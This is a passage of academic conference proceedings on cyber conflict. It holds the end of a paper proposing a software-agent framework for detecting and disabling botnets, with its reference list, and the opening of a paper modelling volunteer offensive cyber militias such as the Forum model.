engineering (Bailey et al. 2009) is a major cause of infection, which defeats many prevention systems<br />
and undermines detection.<br />
One development that will likely impact the malware threatscape is the arrival of broadband access to<br />
Africa. For an analysis of the impact see (Jansen van Vuuren, Phahlamohlaka & Brazzoli 2010). It is<br />
estimated that there are 100 million computers available for botnet herders to use (Carr, Shepherd<br />
2010). However, we are of the opinion that, due to a range of socio-economic factors, Africa may be a<br />
source of volunteers for botnets similar to Israel’s Defenderhosting.<br />
2. Malware<br />
Malware is a term encompassing all the different categories of malicious software, which include<br />
amongst others Trojans, viruses, worms and spyware. The advancements in technology and<br />
especially the ability to be 24/7 connected to people and resources across the globe have hugely<br />
increased the volumes of malware circulating global networks. This is evident from the large amount<br />
of spam constantly and increasingly being delivered to mailboxes. According to Damballa (2009) the<br />
success of spamming botnets has led to the commoditization of spam in which volume has become<br />
the primary means to generate cash.<br />
Malware are created and initiated in countries across the globe with different websites listing different<br />
statistics regarding the country of origin, on a weekly basis. For example the USA, China and Russia<br />
are being listed by The Spamhaus Project (http://www.spamhaus.org/statistics/countries.lasso) as the<br />
countries where the largest percentage of spam are created and exported, while M86 Security Labs<br />
(http://www.m86security.com/labs/spam_statistics.asp) list the US, India and Brazil as the recent<br />
largest contributors.<br />
Creating or obtaining malware has become relatively easy with the evolution of technology and<br />
especially the commoditization of malicious code. Different types of malware can be obtained via<br />
malware kits or through specialists offering their services to design and develop unique pieces of<br />
malicious code for different platforms or forums. Some of the more famous examples include<br />
Webattacker, Smeg, Fragus, Zeus and Adpack.<br />
The evolution and spread of malware is directly related to the number of entities being connected,<br />
with the increase in not only the amount but also the different types of malware being evident today.<br />
With the increase in malware also came constant research and development to combat these<br />
unwanted software, which in turn leads to the creators of malware to be more innovative. According to<br />
Chiang & Lloyd (2007), the traditional method of using the Internet Relay Chat (IRC) protocol for<br />
command and control made way for new methods of hiding the command and control communication<br />
such as HTTP based communications, encryption and peer-to-peer networks as it became easier to<br />
detect and block IRC traffic. This became evident in the creation and re-invention of botnets such as<br />
Agobot (Wang, 2009), Rustock (Chiang & Lloyd, 2007) and Conficker (Porras, 2009).<br />
The impact of the advances, commoditization and the DIY culture for the creation of malware on<br />
global networks and especially global security is huge. Malware is being used to amongst others steal<br />
personal data, conduct espionage, harm government and business operations, deny user access to<br />
information and services and according to the report conducted by the International Organization for<br />
Economic co-operation and Development (OECD, 2007) poses a serious threat to the Internet<br />
economy. Securing networks is not only depended on security vendors and security specialists but<br />
also rely on normal users of the networks to protect their stations. The increasing use of social<br />
299
Evan Dembskey and Elmarie Biermann<br />
networks such as Facebook, Twitter and MySpace as well as mobile generation provide increasing<br />
grounds for malware to access contact details and personal information.<br />
It is vital for the Internet economy that robust and resilient counter systems needs to be constantly in<br />
operation, while adapting to changing conditions.<br />
3. Current malware detection techniques<br />
The first hint of a malware infection may be the receipt of an email stating that a system appears to be<br />
infected and has abused a different system; the convention is that administrative contacts of some<br />
form are listed at global regional information registry sites such as AfriNIC, ARIN, APNIC, LAPNIC<br />
and RIPE to assist in communication. The abuse may take the form of spam, scanning activity, DDoS<br />
attacks, phishing or harassment ((Schiller, Binkley & Harley 2007).<br />
It is a poor security method indeed that relies on informants only. A better approach is the use of<br />
network-monitoring tools such as wireshark or tcpdump as malware activity results in data that can be<br />
analysed. Examples of prevalent data types are (Bailey et al. 2009):<br />
DNS Data: Data regarding name resolution can be obtained by mirroring data to and from DNS<br />
servers and can be used to detect both botnet attack behaviour.<br />
Netflow Data: Netflow data represents information gathered from the network by sampling traffic<br />
flows and obtaining information regarding source and destination IP addresses and port numbers.<br />
This is not available on all networks.<br />
Packet Tap Data: Packet tap data, while providing a more fine grained view than netflow but is<br />
generally more costly in terms of hardware and computation. Simple encryption reduces this<br />
visibility back to the same order as netflow.<br />
Address Allocation Data: Knowing where hosts and users are in the network can be a powerful<br />
tool for identifying malware reconnaissance behaviour and rapid attribution.<br />
Honeypot Data: Placed on a network with the express intention of them being turned into botnet<br />
members, honeypots can be a powerful tool for gaining insight into botnet means and motives.<br />
Host Data: Host level data, from OS and application configurations, logs and user activity<br />
provides a wealth of security information and can avoid the visibility issues with encrypted data.<br />
An even better method is an Intrusion Detection System (IDS). An IDS can either be host-based<br />
(HIDS) or network-based (NIDS). Both of these are further categorised by the type of algorithm used,<br />
namely anomaly- and signature-based detection. Anomaly–based techniques develop an<br />
understanding of what normal behaviour is on a system, and reports any deviation. Signature-based<br />
techniques use representations of known malware to decide if software is indeed malicious. A<br />
specialised form of anomaly-based detection, called specification-based detection makes use of a<br />
rule set to decide if software is malicious. Violation of these rules indicates possible malicious<br />
software.<br />
A NIDS sees protected hosts in terms of the external interfaces to the rest of the network, rather than<br />
as a single system, and gets most of its results by network packet analysis. Much of the data used is<br />
the same as discussed using the manual methods above. A HIDS focuses on individual systems.<br />
That doesn’t mean each host runs its own HIDS application, they are generally administered centrally,<br />
rather it means that the HIDS monitors activity on a protected host. It can pick up evidence of<br />
breaches that have evaded outward-facing NIDS and firewall systems or have been introduced by<br />
other means, such internal attacks, direct tampering from internal users and the introduction of<br />
malicious code from removable media (Schiller, Binkley & Harley 2007).<br />
Malware can also be detected forensically. Though this occurs after damage has been incurred, it is<br />
important for a number of reasons including legal purposes. Forensic aims can include identification,<br />
preservation, analysis, and presentation of evidence. Digital investigations that are or might be<br />
presented in a court of law must meet the applicable standards of admissible evidence. Admissibility<br />
is a concept that varies according to jurisdiction (Schiller, Binkley & Harley 2007).<br />
Two techniques that are essentially forensic in nature are darknets and honeynets, though the<br />
knowledge gained from their use helps to prevent, detect and remove botnets. A darknet is a closed<br />
private network used for file sharing. However, the term has been extended in the security sphere to<br />
apply to IP address space that is routed but which no active hosts and therefore no legitimate traffic.<br />
300
Evan Dembskey and Elmarie Biermann<br />
Darknets are most useful as global resource for sites and groups working against botnets on an<br />
Internet-wide basis (Schiller, Binkley & Harley 2007). A honeypot is a decoy system set up to attract<br />
attackers and study their methods and capabilities. A honeynet is usually defined as consisting of a<br />
number of honeypots in a network, offering the attacker real systems, applications, and services to<br />
work on and monitored transparently by a Layer 2 bridging device (honeywall). A static honeynet can<br />
quickly be spotted and blacklisted by attackers, but distributed honeynets attempt to address that<br />
issue and are likely to capture richer, more varied data (Schiller, Binkley & Harley 2007). In contrast to<br />
honeynets, darknets do not advertise themselves.<br />
Botnets, the malware we are interested in, are difficult to combat for the following reasons (Bailey et<br />
al. 2009):<br />
All aspects of the botnet’s life-cycle are all evolving constantly.<br />
Each detection technique comes with its own set of tradeoffs with respect to false positives and<br />
false negatives.<br />
Different types of networks approach the botnet problem with differing goals, with different<br />
visibility into the botnet behaviours, and different sources of data with which to uncover those<br />
behaviours.<br />
A successful solution for combating botnets will need to cope with each of these realities and their<br />
complex interactions with each other.<br />
4. Software agents<br />
A software agent is a program that autonomously acquires, manipulates, distributes and maintains<br />
information on behalf of some entity. We reject the trend of labeling software utilities such as<br />
aggregators and download managers as SA; we base our definition on the properties of the software.<br />
The literature defines a large number of agent properties. Not all properties are found in all agents,<br />
but an in order to be termed Agent software must satisfy some minimum set of these properties. Bigus<br />
and Bigus (Bigus, Bigus 2001) suggest that these are autonomy, intelligence and mobility. These<br />
properties are defined as follows:<br />
Autonomy - The autonomous agent exercises control over its own actions and has some degree<br />
of control over its internal state. It displays judgment when faced with a situation requiring a<br />
decision, and makes a decision without direct external intervention.<br />
Intelligence - This does not imply self-awareness, but the ability to behave rationally and pursue a<br />
goal in a logical and rational manner. Intelligence varies between simple coded logic and complex<br />
AI-based methods such as inferencing and learning.<br />
Mobility- Mobility is the degree to which agents move through the network. Some may be static<br />
while others may migrate as the need arises. The decision to move should be made by the agent<br />
(Murch, Johnson 1999), thus ensuring the agent has the property of autonomy.<br />
From these properties we can judge that SA have potential applications in dealing with tasks that are<br />
ill-defined or less structured. It is also apparent that SA interact with their task environments locally;<br />
the implication of this is that the same agent can exhibit different behaviour in different environments<br />
(Liu 2001). Padgham & Winikoff ((Padgham, Winikoff 2004)) provide a list of reasons why agents are<br />
useful, including loose coupling, decentralisation, persistence, better functioning in open and complex<br />
systems and reactiveness as well as proactivness. The use of SA to combat botnets is not<br />
unprecedented. It had already been suggested that AF.MIL should be purposely made part of a<br />
botnet ((Williams 2008)). Some researchers see botnets as types of SA ((Bigus, Bigus 2001)). Other<br />
researchers ((Stytz, Banks 2008)) have begun to work on the problem of implementing such an<br />
approach.<br />
5. Proposed system<br />
Vulnerabilities are introduced in software deliberately or accidently during development, or via<br />
software or configuration changes during operation. Botnets are not typically introduced during<br />
software development and thus require later introduction, and usually unintentionally. Possible vectors<br />
of infection are viruses, worms and Trojans. These may be introduced via email, download, drive-by<br />
download, network worm or some external storage device. According to (Cruz 2008) the majority of<br />
infections occur due to downloads (53%) and infection via other malware (43%). Email and<br />
removable drives account for 22% of infections. Instant Messaging, vulnerabilities, P2P, iFrame<br />
301
Evan Dembskey and Elmarie Biermann<br />
compromises, other infected files and other vectors account for 27% (the total is higher than 100%<br />
because some malware uses multiple vectors). The vast majority of infections are as a result of<br />
downloads, suggesting this should be the primary threat to mitigate. This is the attitude adopted in this<br />
research, with the recognition that this could change at any time, temporarily or permanently, thus<br />
necessitating a system that is flexible enough to cope with this change.<br />
Several methods to detect and deter botnets have been proposed such as incorporating data mining<br />
techniques as well as incorporating methods to detect communication between the bot and the<br />
master (Massud et al., 2008).<br />
Massive multiplayer online role playing games (MMORPG) battle to differentiate between human and<br />
bot players. Yampolskiy & Govindaraju (2008) studied running processes and network traffic as a<br />
method to distinguish between humans and bots. Chen et al (2009) identified bots in MMORPG<br />
through traffic analysis. They showed amongst others that traffic is distinguishable by (1) the regularity<br />
in the release time of the client command; (2) the trend and magnitude of traffic burstiness in multiple<br />
time scales; and (3) the sensitivity to different network connections. Thawonmas et al (2008), conduct<br />
behaviour analysis within this gaming environment and implement methods focusing on resource<br />
gathering and trading behavior. Traffic classification is also proposed and done by Li et al (2009), with<br />
Lu et al (2009) proposing a hierarchical framework to automatically discover botnets. They first<br />
classify network traffic into different application communities by using payload signatures.<br />
Virtual bots are also introduced as a method to create uncertainties in the botnet market. Li et al<br />
(2008) followed a different perspective by looking at botnet disabling mechanisms from an economic<br />
perspective. This links to methods looking at collective behavior of bots, i.e. studying the focus and<br />
deriving solutions from there (Pathak et al., 2009; Stone-Gross et al., 2009). Xie et al (2008)<br />
characterize botnets by leveraging spam payload and spam server traffic properties. They identify<br />
botnet hosts by generating botnet spam signatures from emails. Ramachandran. & Feamster (2008)<br />
studied the network level behavior of spammers. They identified specific characteristics, such that<br />
spam is being sent from a few regions of IP address space. They also propose that developing<br />
algorithms to identify botnet memberships need to be based on network level properties. Staying on<br />
the network level, Villamarín-Salomón & Brustoloni (2009) propose a Bayesian approach for detecting<br />
bots based on the similarity of their DNS traffic to that of known bots.<br />
A detailed look into the solutions summarized above, led us to propose a design incorporating the use<br />
of intelligent SA as a counter to botnets. Our design incorporates the different aspects and required<br />
characteristics as detailed in literature. Our design is also a next step in detailing our proposed<br />
framework (Dembskey, Biermann 2008) As stated in (Dembskey, Biermann 2008), we propose three<br />
layers, namely IDS, Observer and Communication.<br />
Figure 1: Three layers<br />
IDS<br />
Observer<br />
Communication Layer<br />
302
Evan Dembskey and Elmarie Biermann<br />
Using these layers as our starting point we introduce sub-layers and descriptions as depicted in<br />
Figure 2. We only focus on the Observer and IDS layers.<br />
The observer layer consists of five sub-layers all focusing on gathering information:<br />
Collective Behaviour<br />
Communication Analysis<br />
Resource Gathering<br />
Spreading & Growth Patterns<br />
Network Traffic Analysis<br />
Each of these sub-layers focuses on particular aspects of gathering information through observation.<br />
This observation is conducted through a focused software agent network.<br />
Within network traffic analysis, intensive signature analyses are conducted in order to provide data to<br />
the IDS layer. From these analyses, information on spreading and growth patterns is gathered and<br />
models proposed. Resource gathering focused on observing specifics such as bandwidth depletion<br />
and resource utilizations. Communication analysis refers to the communications taking place between<br />
bots and masters and the analysis thereof. This will assist in determining the collective behaviour or<br />
focus of the botnet as well as assist in detailing the economic focus.<br />
The information gathered within the observer layer is used as input to the IDS layer. The IDS layer will<br />
function as both a HIDS and a NIDS; that is, it will have operational agents on hosts and servers. The<br />
IDS layer includes the following:<br />
Infiltrate and disable<br />
Spawn Intelligent Software Agent Network<br />
Classification<br />
The information gathered within the observer level are use to classify the botnet and according to the<br />
classification an intelligent software agent network is spawned to infiltrate and ultimately disable the<br />
botnet.<br />
Agentification of email client and server software, host and server monitoring software, host and<br />
server firewall and AV software, network monitoring software, user monitoring software is required, or<br />
at least, the capability to interface with these applications.<br />
It is anticipated that the crowd sourcing component will function on two layers. Firstly, SA from<br />
different organizations will communicate threats amongst themselves with minimal supervision.<br />
Secondly, information will be sourced from human beings. Both open and proprietary sources should<br />
be used, but the following two points must be kept in mind. The use of proprietary systems will have a<br />
cost implication and the use of that data may not legally be allowed to propagate through the entire<br />
SA system. Secondly, the possibility of attack vectors being introduced is a real concern – if crowd<br />
sourcing results in false positives through the means of concerted and purposeful false reporting, then<br />
a DoS attack may occur, with the system’s SA falsely identify normal activity as malicious and halt it.<br />
A robust and up-to-date system that can share data on the safety of web sites and software will<br />
mitigate the risk from the primary sources of infection discussed above. The CYBEX (X.1500) is in the<br />
opinion of the authors the correct path to follow to implement this system.<br />
As part of this research we will implement and test a model of the proposed system against a variety<br />
of botnets. The model will not be comprehensive and will focus on mitigating threats launched via<br />
drive-by downloads and locally installed software. The network of NIDS and HIDS with the crowd<br />
sourcing component will be implemented.<br />
We must also consider the impact of virtualization and the trend towards cloud and grid computing,<br />
which we think will continue. It is also not the intention that this system is entirely automated, as the<br />
effect of systemic failure may be worse than anticipated and human intervention may serve to mitigate<br />
this risk.<br />
303
Evan Dembskey and Elmarie Biermann<br />
In summary, we propose to model and implement a proof-of-concept of an integrated SA botnet<br />
defense system. Some challenges of developing such a system are its complexity and human privacy<br />
requirements and laws. Rather than be daunted by this, we instead believe that the effort will be well<br />
rewarded and will identify future areas of research.<br />
IDS Level<br />
Observer Level<br />
Figure 2: Observer and IDS layers<br />
References<br />
Infiltrate and Disable<br />
Spawn Intelligent Software Agent Network<br />
Classification<br />
Collective Behavior<br />
Communication Analysis<br />
Resource Gathering<br />
Spreading & Growth Patterns<br />
Network Traffic Analysis<br />
Bailey, M., Cooke, E., Jahanian, F., Xu, Y. & Karir, M. 2009, "A survey of botnet technology and defenses",<br />
Proceedings of the 2009 Cybersecurity Applications & Technology <strong>Conference</strong> for Homeland Security-<br />
Volume 00, IEEE Computer Society, pp. 299.<br />
Bigus, J.P. & Bigus, J. 2001, Constructing intelligent agents using Java, Wiley New York.<br />
Carr, J. & Shepherd, L. 2010, Inside cyber warfare, 1st edn, O'Reilly Media, Inc., Sebastopol, Calif.<br />
304
Evan Dembskey and Elmarie Biermann<br />
Chen, K., Jiang, J., Huang, P., Chu, H., Lei, C. & Chen, W. 2009. Identifying MMORPG Bots: A Traffic Analysis<br />
Approach. EURASIP Journal on Advances in signal Processing. Volume 2009, Article 3.<br />
Chiang, K. & Lloyd, L. 2007. A Case Study of the Rustock Rootkit and Spam Bot. Proceedings of the First<br />
Workshop on Hot Topics in Understanding Botnets, Cambridge, MA.<br />
Cruz, M. 2008, , Most Abused Infection Vector. Available: http://blog.trendmicro.com/most-abused-infectionvector/<br />
[2010, 9/27/2010].<br />
Damballa Inc. 2009. Upate on the Enemy: A deconstruction of who profits from botnets. Available:<br />
http://www.damballa.com/downloads/d_pubs/WP%20Update%20on%20the%20Enemy%20(2009-05-<br />
13).pdf<br />
Dembskey, E. & Biermann, E. 2008, "Software agent framework for computer network operations in IW",<br />
Proceedings of the 3rd International <strong>Conference</strong> On Information Warfare And Security, ed. L. Armistead,<br />
ACL, pp. 127.<br />
Denning, P.J. & Denning, D.E. 2010, "Discussing cyber attack", Commun.ACM, vol. 53, no. 9, pp. 29-31.<br />
Dunham, K. & Melnick, J. 2009, Malicious Bots: An Inside Look Into the Cyber-Criminal Underground of the<br />
Internet, Auerbach Publications.<br />
Jansen van Vuuren, J., Phahlamohlaka, J. & Brazzoli, M. 2010, "The Impact of the Increase in Broadband<br />
Access on South African National Security and the Average citizen", Proceedings of the 5th International<br />
<strong>Conference</strong> on Information Warfare and Security, ed. L. Armistead, ACL , pp. 171.<br />
Knapp, K.J. & Boulton, W.R. 2008, "Ten Information Warfare Trends" in Cyber Warfare and Cyber Terrorism,<br />
eds. Kenneth Knapp & William Boulton, IGI Global, US; Hershey, PA, pp. 17-25.<br />
Li, Z., Liao, Q & Striegel, A. 2008. Botnet Economics: Uncertainty Matters. Workshop on the Economics of<br />
Information Security (WEIS 2008), London, England.<br />
Li, Z., Goyal, A., Chen, Y. & Paxson, V. 2009. Automating Analysis of Large-Scale Botnet Probing Events.<br />
Proceedings of the 4 th International Symposium on Information, Computer and Communications Security.<br />
Sydney, Australia.<br />
Liu, J. 2001, Autonomous agents and multi-agent systems: explorations in learning, self-organization, and<br />
adaptive computation, World Scientific.<br />
Liu, J., Xiao, Y., Ghaboosi, K., Deng, H. & Zhang, J. 2009. Botnet: Classification, Attacks, Detection, Tracing and<br />
Preventive measures. EURASIP Journal on Wireless Communications and Networking, Volume 2009.<br />
Hindawi Publishing Corporation.<br />
Lu, W. Tavallaee, M. & Ghorbani, AA. 2009. Automatic Discovery of Botnet Communities on Large-Scale<br />
Communication Networks. Proceedings of the 4 th International Symposium on Information, Computer and<br />
Communications Security. Sydney, Australia.<br />
Masud, MM., Gao, J., Khan, L., Han, J. & Thuraisingham, B. 2008. Peer to Peer Botnet Detection for Cyber-<br />
Security: A Data Mining Approach. In: Proceedings of the 4 th annual workshop on Cyber security and<br />
information intelligence research: developing strategies to meet the cyber security and information<br />
intelligence challenges ahead. Oak ridge, Tennessee.<br />
Microsoft, 2010. Download details: Microsoft Security Intelligence Report volume 8 (July - December 2009).<br />
Available: http://www.microsoft.com/downloads/details.aspx?FamilyID=2c4938a0-4d64-4c65-b951-<br />
754f4d1af0b5&displaylang=en [7/21/2010].<br />
Murch, R. & Johnson, T. 1999, Intelligent software agents, prentice Hall PTR.<br />
National Research Council (U.S.). Committee on the Role of Information Technology in Responding to Terrorism,<br />
Hennessy, J.L., Patterson, D.A., Lin, H. & National Academies Press 2003, Information technology for<br />
counterterrorism: immediate actions and future possibilities, National Academies Press, Washington, D.C.<br />
OECD (Organization for Economic Co-operation and Development). 2007. Malicious Software (Malware): A<br />
Security Threat to the Internet Community. Ministerial Background Report [Online]. Available:<br />
http://www.oecd.org/dataoecd/53/34/40724457.pdf<br />
Ollmann, G. 2010, "Asymmetrical Warfare: Challenges and Strategies for Countering Botnets", The 5th<br />
International <strong>Conference</strong> on Information-Warfare & SecurityACI, Reading, England, pp. 507.<br />
Oram, A. & Viega, J. 2009, Beautiful security, 1st edn, O'Reilly, Sebastopol, CA.<br />
Padgham, L. & Winikoff, M. 2004, Developing intelligent agent systems: a practical guide, Wiley.<br />
Pathak, A., Qian, F., Hu, Y.C., Mao, ZM. & Ranjan, S. 2009. Botnet Spam Campaigns Can Be Long Lasting:<br />
Evidence, Implications, and Analysis. Proceedings of the 11 th International Joint <strong>Conference</strong> on<br />
Measurement and Modeling of Computer Systems. SIGMETRICS / Performance'09, June 15-19, 2009,<br />
Seattle, WA.<br />
Porras, P. 2009. Reflections on Conficker: An insider's view of the analysis and implications of the Conficker<br />
conundrum. CACM 52 (10). October.<br />
Prince, B. 2010,, Russian Cybercrime: Geeks, Not Gangsters | eWEEK Europe UK. Available:<br />
http://www.eweekeurope.co.uk/knowledge/russian-cybercrime-geeks-not-gangsters-9182/2 [2010,<br />
8/30/2010].<br />
Ramachandran, A. & Feamster, N. 2006. Understanding the Network Level Behavior of Spammers. Proceedings<br />
of the 2006 <strong>Conference</strong> on Applications, Technologies, Architectures and Protocols for Computer<br />
Communications, SIGCOMM’06, September 11-15, 2006, Pisa, Italy.<br />
Schiller, C.A., Binkley, J. & Harley, D. 2007, Botnets: the killer web app, Syngress Media Inc.<br />
Smith, G. 1998,, Issues in S and T, Fall 1998, An Electronic Pearl Harbor? Not Likely. Available:<br />
http://www.issues.org/15.1/smith.htm [2010, 8/16/2010].<br />
305
Evan Dembskey and Elmarie Biermann<br />
Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B. & Szydlowski, M. 2009. Your Botnet is My Botnet: Analysis<br />
of a Botnet Takeover. Proceedings of the 16 th ACM <strong>Conference</strong> on Computer and Communications<br />
Security. CCS’09, November 9–13, 2009, Chicago, Illinois, USA.<br />
Stytz, M.R. & Banks, S.B. 2008, Toward Intelligent Agents For Detecting Cyberattacks<br />
Thawonmas, R. Kashifuji, Y. & Chen, K. 2008. Detection of MMORPG Bots Based on Behavior Analysis.<br />
Proceedings of the 2008 International <strong>Conference</strong> on Advances in Computer Entertainment Technology.<br />
Yokohama, Japan.<br />
Villamarín-Salomón, R. & Brustoloni, JC. 2009. Bayesian Bot Detection Based on DNS Traffic Similarity.<br />
Proceedings of the 2009 ACM symposium on Applied Computing, SAC’09, March 8-12, 2009, Honolulu,<br />
Hawaii, U.S.A.<br />
Wang, Y., Gu, D., Xu, J. & Du, H. 2009. Hacking Risk Analysis of Web Trojan in Electric Power System. In:<br />
Proceedings of the International <strong>Conference</strong> on Web Information Systems and Mining. Shanghai, China.<br />
Williams, C.W. 2008,, Carpet bombing in cyberspace - May 2008 - Armed Forces Journal - Military Strategy,<br />
Global Defense Strategy. Available: http://www.armedforcesjournal.com/2008/05/3375884 [2010,<br />
7/20/2010].<br />
Yampolskiy, RV. & Govindaraju, V. 2008. Embedded Non-interactive Continuous Bot Detection. ACM Computers<br />
in Entertainment, Vol. 5, No. 4, Article 7. Publication Date: March 2008.<br />
Xie, Y., Yu, F., Achan, K., Panigrahy, R., Hulten, G. & Osipkov, I. 2008. Spamming Botnets: Signatures and<br />
Characteristics. Proceedings of th 2008 <strong>Conference</strong> on Applications, Technologies, Architectures and<br />
Protocols for Computer Communications,SIGCOMM’08, August 17–22, 2008, Seattle, Washington.<br />
306
Theoretical Offensive Cyber Militia Models<br />
Rain Ottis<br />
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia<br />
rain.ottis@ccdcoe.org<br />
Abstract. Volunteer based non-state actors have played an important part in many international cyber conflicts of<br />
the past two decades. In order to better understand this threat I describe three theoretical models for volunteer<br />
based offensive cyber militias: the Forum, the Cell and the Hierarchy. The Forum is an ad-hoc cyber militia form<br />
that is organized around a central communications platform, where the members share information and tools<br />
necessary to carry out cyber attacks against their chosen adversary. The Cell model refers to hacker cells, which<br />
engage in politically motivated hacking over extended periods of time. The Hierarchy refers to the traditional<br />
hierarchical model, which may be encountered in government sponsored volunteer organizations, as well as in<br />
cohesive self-organized non-state actors. For each model, I give an example and describe the model’s attributes,<br />
strengths and weaknesses using qualitative analysis. The models are based on expert opinion on different types<br />
of cyber militias that have been seen in cyber conflicts. These theoretical models provide a framework for<br />
categorizing volunteer based offensive cyber militias of non-trivial size.<br />
Keywords: cyber conflict, cyber militia, cyber attack, patriotic hacking, on-line communities<br />
1. Introduction<br />
The widespread application of Internet services has given rise to a new contested space, where<br />
people with conflicting ideals or values strive to succeed, sometimes by attacking the systems and<br />
services of the other side. It is interesting to note that in most public cases of cyber conflict the<br />
offensive side is not identified as a state actor, at least not officially. Instead, it often looks like citizens<br />
take part in hactivist campaigns or patriotic hacking on their own, volunteering for the cyber front.<br />
Cases like the 2007 cyber attacks against Estonia are a good example where an informal non-state<br />
cyber militia has become a threat to national security. In order to understand the threat posed by<br />
these volunteer cyber militias I provide three models of how such groups can be organized and<br />
analyze the strengths and weaknesses of each.<br />
The three models considered are the Forum, the Cell and the Hierarchy. The models are applicable to<br />
groups of non-trivial size, which require internal assignment of responsibilities and authority.<br />
1.1 Method and limitations<br />
In this paper I use theoretical qualitative analysis in order to describe the attributes, strengths and<br />
weaknesses of three offensively oriented cyber militia models. I have chosen the three plausible<br />
models based on what can be observed in recent cyber conflicts. The term model refers to an abstract<br />
description of relationships between members of the cyber militia, including command, control and<br />
mentoring relationships, as well as the operating principles of the militia.<br />
Note, however, that the description of the models is based on theoretical reasoning and expert<br />
opinion. It offers abstract theoretical models in an ideal setting. There may not be a full match to any<br />
of them in reality or in the examples provided. It is more likely to see either combinations of different<br />
models or models that do not match the description in full. On the other hand, the models should<br />
serve as useful frameworks for analyzing volunteer groups in the current and coming cyber conflicts.<br />
In preparing this work, I communicated with and received feedback from a number of recognized<br />
experts in the field of cyber conflict research. I wish to thank them all for providing comments on my<br />
proposed models: Prof Dorothy Denning (Naval Postgraduate School), Dr Jose Nazario (Arbor<br />
Networks), Prof Samuel Liles (Purdue University Calumet), Mr Jeffrey Carr (Greylogic) and Mr<br />
Kenneth Geers (Cooperative Cyber Defence Centre of Excellence).<br />
2. The forum<br />
The global spread of the Internet allows people to connect easily and form „cyber tribes“, which can<br />
range from benign hobby groups to antagonistic ad-hoc cyber militias. (Williams 2007, Ottis 2008,<br />
Carr 2009, Nazario 2009, Denning 2010) In the case of an ad-hoc cyber militia, the Forum unites likeminded<br />
people who are “willing and able to use cyber attacks in order to achieve a political goal.“<br />
307
Rain Ottis<br />
(Ottis 2010b) It serves as a command and control platform where more active members can post<br />
motivational materials, attack instructions, attack tools, etc. (Denning 2010)<br />
This particular model, as well as the strengths and weaknesses covered in this section, are based on<br />
(Ottis 2010b). A good example of this model in recent cyber conflicts is the stopgeorgia.ru forum<br />
during the Russia-Georgia war in 2008 (Carr 2009).<br />
2.1 Attributes<br />
The Forum is an on-line meeting place for people who are interested in a particular subject. I use<br />
Forum as a conceptual term referring to the people who interact in the on-line meeting place. The<br />
technical implementation of the meeting place could take many different forms: web forum, Internet<br />
Relay Chat channel, social network subgroup, etc. It is important that the Forum is accessible over<br />
Internet and preferably easy to find. The latter condition is useful for recruiting new members and<br />
providing visibility to the agenda of the group.<br />
The Forum mobilizes in response to an event that is important to the members. While there can be a<br />
core group of people who remain actively involved over extended periods of time, the membership<br />
can be expected to surge in size when the underlying issue becomes “hot“. Basically, the Forum is<br />
like a flash mob that performs cyber attacks instead of actions on the streets. As such, the Forum is<br />
more ad-hoc than permanent, because it is likely to disband once the underlying event is settled.<br />
The membership of the Forum forms a loose network centered on the communications platform,<br />
where few, if any, people know each other in real life and the entire membership is not known to any<br />
single person (Ottis 2010b). Most participate anonymously, either providing an alias or by remaining<br />
passive on the communication platform. In general, the Forum is an informal group, although specific<br />
roles can be assumed by individual members. For example, there could be trainers, malware<br />
providers, campaign planners, etc. (Ottis 2010b) Some of the Forum members may also be active in<br />
cyber crime. In that case, they can contribute resources such as malware or use of a botnet to the<br />
Forum.<br />
The membership is diverse, in terms of skills, resources and location. While there seems to be<br />
evidence that a lot of the individuals engaged in such activities are relatively unskilled in cyber attack<br />
techniques (Carr 2009), when supplemented with a few more experienced members the group can be<br />
much more effective and dangerous (Ottis 2010a).<br />
Since most of the membership remains anonymous and often passive on the communications<br />
platform, the leadership roles will be assumed by those who are active in communicating their intent,<br />
plans and expertise. (Denning 2010) However, this still does not allow for strong command and<br />
control, as each member can decide what, if any, action to take.<br />
2.2 Strengths<br />
One of the most important strengths of a loose network is that it can form very quickly. Following an<br />
escalation in the underlying issue, all it takes is a rallying cry on the Internet and within hours or even<br />
minutes the volunteers can gather around a communications platform, share attack instructions, pick<br />
targets and start performing cyber attacks.<br />
As long as there is no need for tightly controlled operations, in terms of timing, resource use and<br />
targeting, there is very little need for management. The network is also easily scalable, as anyone can<br />
join and there is no lengthy vetting procedure.<br />
The diversity of the membership means that it is very difficult for the defenders to analyze and counter<br />
the attacks. The source addresses are likely distributed globally (black listing will be inefficient) and<br />
the different skills and resources ensure heterogeneous attack traffic (no easy patterns). In addition,<br />
experienced attackers can use this to conceal precision strikes against critical services and systems.<br />
While it may seem that neutralizing the communications platform (via law enforcement action, cyber<br />
attack or otherwise) is an easy way to neutralize the militia, this may not be the case. The militia can<br />
easily regroup at a different communications platform in a different jurisdiction. Attacking the Forum<br />
directly may actually increase the motivation of the members. (Ottis 2010b)<br />
308
Rain Ottis<br />
Last, but not least, it is very difficult to attribute these attacks to a state, as they can (seem to) be a<br />
true (global) grass roots campaign, even if there is some form of state sponsorship. Some states may<br />
take advantage of this fact by allowing such activity to continue in their jurisdiction, blaming legal<br />
obstacles or lack of capability for their inactivity. It is also possible for government operatives to<br />
“create” a “grass roots” Forum movement in support of the government agenda. (Ottis 2009)<br />
2.3 Weaknesses<br />
A clear weakness of this model is the difficulty to command and control the Forum. Membership is not<br />
formalized and often it is even not visible on the communication platform, because passive readers<br />
can just take ideas from there and execute the attacks on their own. This uncoordinated approach can<br />
seriously hamper the effectiveness of the group as a whole. It may also lead to uncontrolled<br />
expansion of conflict, when members unilaterally attack third parties on behalf of the Forum.<br />
A problem with the loose network is that it is often populated with people who do not have experience<br />
with cyber attacks. Therefore, their options are limited to primitive manual attacks or preconfigured<br />
automated attacks using attack kits or malware. (Ottis 2010a) They are highly reliant on instructions<br />
and tools from more experienced members of the Forum.<br />
The Forum is also prone to infiltration, as it must rely on relatively easily accessible communication<br />
channels. If the communication point is hidden, the group will have difficulties in recruiting new<br />
members. The assumption is, therefore, that the communication point can be easily found by both<br />
potential recruits, as well as infiltrators. Since there is no easy way to vet the incoming members,<br />
infiltration should be relatively simple.<br />
Another potential weakness of the Forum model is the presumption of anonymity. If the membership<br />
can be infiltrated and convinced that their anonymity is not guaranteed, they will be less likely to<br />
participate in the cyber militia. Options for achieving this can include “exposing” the “identities” of the<br />
infiltrators, arranging meetings in real life, offering tools that have a phone-home functionality to the<br />
members, etc. Note that some of these options may be illegal, depending on the circumstances. (Ottis<br />
2010b)<br />
3. The cell<br />
Another model for a volunteer cyber force that has been seen is a hacker cell. In this case, the<br />
